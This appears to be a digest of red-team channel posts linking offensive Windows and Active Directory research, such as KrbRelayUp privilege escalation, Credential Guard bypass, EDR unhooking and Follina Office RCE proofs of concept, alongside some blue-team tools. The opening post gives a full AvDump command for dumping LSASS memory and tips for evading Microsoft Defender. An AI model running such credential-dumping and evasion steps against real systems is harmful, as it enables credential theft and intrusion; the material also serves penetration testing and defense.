🔐 Dumping LSASS with AV

Sometimes Antivirus is attackers' best friend. Here is how you can use Avast AV to dump lsass memory

Commands:
.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

To bypass Microsoft Defender, remember to rename the AvDump.exe file. Also, don't use the name lsass.dmp (see screenshot).

There's also Metasploit post exploitation module for this under post/windows/gather/avast_memory_dump

AvDump.exe is located at C:\Program Files\Avast Software\Avast.

You can also download AvDump.exe from this link.

VirusTotal Details:
https://www.virustotal.com/gui/file/52a57aca1d96aee6456d484a2e8459681f6a7a159dc31f62b38942884464f57b/details

#ad #evasion #lsass #dump #avast #redteam

🔍 LDAP Search Reference

A detailed reference for using ldapsearch for RedTeam operations.

https://malicious.link/post/2022/ldapsearch-reference/

#ad #ldap #ldapsearch #redteam

🛠 DNSHostName Spoofing combined with KrbRelayUp

Domain user to domain admin without the requirement for adding/owning previously a computer account. Step-by-step write-up of the attack in a pure Windows environment.

https://gist.github.com/tothi/f89a37127f2233352d74eef6c748ca25

#ad #adcs #privesc #ldap #relay #redteam

🛠 API Unhooking with Perun's Fart

An article about a new method of avoiding AV/EDR by creating a process in a suspended state and getting a copy of the ntdll from the new process before it is hijacked by AV/EDR.

Research:
https://dosxuz.gitlab.io/post/perunsfart/

PoC:
https://github.com/dosxuz/PerunsFart

#av #edr #evasion #api #unhooking #resarch

🥇 We are winners

On May 18 and 19, The Standoff was held conjunction with the forum on practical information security Positive Hack Days.

Hackers found vulnerabilities in corporate and industrial IT infrastructures, and cybersecurity specialists gained experience in preventing unacceptable events. Thousands of spectators. Unexpected decisions. Unforgettable emotions.

Our Codeby team took first place!
I want to sincerely thank each member of the team, you are the best.
Also many thanks to the organizers of the forum for creating such a large-scale event.

⚙️ No-Fix LPE Using KrbRelay with Shadow Credentials

This article will explain how to separate the shadow credential method that KrbRelayUp uses into multiple different steps, giving you a bit more control regarding how each piece executes. For example, we can reflectively load some pieces, and execute others normally

https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html

#ad #privesc #kerberos #relay

🛠 S4fuckMe2selfAndUAndU2proxy — A low dive into Kerberos delegations

If you still do not understand the intricacies of Kebreros delegation, you should read this article.
This article covers details unconstrained delegation, constrained delegation, and resource-based constrained delegation, as well as recon and abuse techniques.

https://luemmelsec.github.io/S4fuckMe2selfAndUAndU2proxy-A-low-dive-into-Kerberos-delegations/

#ad #kerberos #delegations #article

Уязвимости и атаки на CMS Bitrix

1. Особенности
2. Уязвимости
3. Методы атак

Приятного чтения!

🔐 Credential Guard Bypass

The well-known WDigest module, which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their name is rather self explanatory, the first one holds the state of Credential Guard within the module, the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard was not enabled.

Research:
https://itm4n.github.io/credential-guard-bypass/

PoC:
https://github.com/itm4n/Pentest-Windows/blob/main/CredGuardBypassOffsets/poc.cpp

#lsass #wdigest #credential #guard #research

⚙️ WTFBins

WTFBin(n): a binary that behaves exactly like malware, except, somehow, it's not?
Site detailing noisy, false positive binaries created that's super helpful in getting filter ideas together for monitoring and hunting rules.

https://wtfbins.wtf/

#wtfbins #blueteam

😴 DeepSleep

A variant of Gargoyle for x64 to hide memory artifacts using ROP only and PIC

https://github.com/thefLink/DeepSleep

#memory #evasion #maldev

🎁 Application Security Pipelines
(Now with guides)

Scan your code, infrastructure configs and domains with many open source scanners.

Currently supported: trufflehog, gitleaks, bandit, gosec, spotbugs, terrascan, hadolint, retirejs, eslint, phpcs, sonarqube integration, semgrep, arachni, zap, subfinder, nuclei..

All reports will be passed to defectdojo

Guides:
https://github.com/Whitespots-OU/DevSecOps-Pipelines

Integration examples:
https://gitlab.com/whitespots-public/vulnerable-apps

#appsec #devsecops #pipelines

🔐 Combination of 2 PoCs for bypassing Credential Guard with in-memory invocation

PoC 1 (patch wdigest.dll):
https://gist.github.com/N4kedTurtle/8238f64d18932c7184faa2d0af2f1240

PoC 2 (find variable offsets in runtime):
https://github.com/itm4n/Pentest-Windows/blob/main/CredGuardBypassOffsets/poc.cpp

Merged:
https://gist.github.com/snovvcrash/43e976779efdd20df1596c6492198c99

#lsass #wdigest #credguard

🔍 Find Uncommon Shares

This Python tool equivalent of PowerView Invoke-ShareFinder.ps1 allows to quickly find uncommon shares in vast Windows Active Directory Domains.

https://github.com/p0dalirius/FindUncommonShares

#ad #enum #shares #tools

🩸Max (BloodHound)

Maximizing BloodHound with a simple suite of tools

https://github.com/knavesec/Max

#bloodhound #neo4j #cypher

🔥 MS-MSDT Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Research:
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

PoC:
https://github.com/JohnHammond/msdt-follina
https://github.com/chvancooten/follina.py
https://gist.github.com/tothi/66290a42896a97920055e50128c9f040

Demo Follina with Cobalt Strike:
https://www.youtube.com/watch?v=oM4GHtVvv1c

For BlueTeam:
https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2

Everything new is well-forgotten old:
Research from August 2020. And a few other payloads.

#office #rce #msmsdt #nomacro

📒Simulating attacks with Sysmon

SysmonSimulator is an Open source Windows event simulation utility created in C language, that can be used to simulate most of the attacks using WINAPIs. This can be used by Blue teams for testing the EDR detections and correlation rules. I have created it to generate attack data for the relevant Sysmon Event IDs.

Attack coverage:

— Process Events
— File Events
— Named Pipes Events
— Registry Actions
— Image Loading
— Network Connections
— Create Remote Thread
— Raw Access Read
— DNS Query
— WMI Events
— Clipboard Capture
— Process Image Tampering

Research:
https://rootdse.org/posts/understanding-sysmon-events/

Tool:
https://github.com/ScarredMonk/SysmonSimulator

#sysmon #simulator #blueteam #lab

🕵️ OSINT Collection

Collection of 4000+ OSINT resources

https://metaosint.github.io/table

#osint #recon #collection